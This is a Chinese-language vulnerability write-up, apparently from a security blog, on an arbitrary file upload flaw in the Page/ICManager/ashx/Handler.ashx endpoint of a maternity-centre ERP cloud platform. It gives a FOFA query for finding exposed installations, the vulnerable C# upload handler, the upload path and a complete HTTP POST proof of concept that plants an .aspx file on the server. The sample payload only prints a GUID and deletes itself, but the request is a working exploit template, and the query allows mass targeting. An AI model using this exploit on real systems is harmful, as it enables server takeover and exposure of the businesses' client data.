月子会所ERP管理云平台 Page/ICManager/ashx/Handler.ashx 任意文件上传漏洞


漏洞简介

月子会所ERP管理云平台是由武汉金同方科技有限公司研发团队结合行业月子中心相关企业需求开发的一套综合性管理软件。月子会所ERP管理云平台的 Page/ICManager/ashx/Handler.ashx 接口存在任意文件上传漏洞,由于未对上传文件进行任何过滤,攻击者可利用该漏洞上传恶意文件,进而获取服务器控制权。

fofa语法

body="月子护理ERP管理平台" || body="妈妈宝盒客户端.rar" || body="Page/Login/Login3.aspx" || app="妈妈宝盒-ERP"

漏洞分析

直接看其业务实现逻辑

public class Handler : IHttpHandler {

    public void ProcessRequest(HttpContext context)
    {
        context.Response.ContentType = "text/plain";
        HttpFileCollection flist = context.Request.Files;
        string UploadfileURLList = "";
        if (context.Request.Files.Count > 0)
        {
            for (int i = 0; i < context.Request.Files.Count; i++)
            {
                HttpPostedFile mypost = flist[i];

                string picneme = mypost.FileName;
                string tuozhanming = picneme.Substring(picneme.LastIndexOf(".")).ToLower();     //拓展名

                string newname = GetNewName(tuozhanming);
                UploadfileURLList += newname + "|";
                string url = System.Configuration.ConfigurationManager.AppSettings["UPLOAD_CONTACT_URL"].ToString();
                //../../UploadBaseFolder/Contact/
                mypost.SaveAs(context.Server.MapPath("../" + url + newname));
                System.Threading.Thread.Sleep(100);

            }
            UploadfileURLList = UploadfileURLList.Substring(0, UploadfileURLList.Length - 1);
        }
        context.Response.Write(UploadfileURLList);

    }

    public string GetNewName(string name)
    {
        string time = DateTime.Now.ToString("yy-MM-dd");
        string newname = time.Replace("-", "").Replace(" ", "").Replace(":", "").Replace("年", "").Replace("月", "").Replace("日", "").Replace("/", "");
        return newname + new Random().Next(0000000, 9999999) + name;

    }

直接上传对文件类型无任何过滤或校验,造成任意文件上传漏洞。

UPLOAD_CONTACT_URL 位置在 web.config 设置,一般为

<add key="UPLOAD_CONTACT_URL" value="../../UploadBaseFolder/Contact/" />

所以最终上传文件保存路径为 /UploadBaseFolder/Contact/文件名

漏洞复现

POC

POST /Page/ICManager/ashx/Handler.ashx HTTP/1.1
Host: mamabaohe.mrxn.net
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary123

------WebKitFormBoundary123
Content-Disposition: form-data; name="file"; filename="test.aspx"

<%@Page Language="C#"%><%Response.Write(Guid.NewGuid().ToString("N"));System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath));%>
------WebKitFormBoundary123--

访问上传文件 UploadBaseFolder/Contact/响应文件名

成功打印随机GUID字符串并删除自身。


手机扫码阅读

安美数字酒店宽带运营系统 get_user_enrollment.php SQL注入漏洞

月子会所ERP管理云平台 Page/MicroMall/ashx/Handler.ashx 任意文件上传漏洞

评 论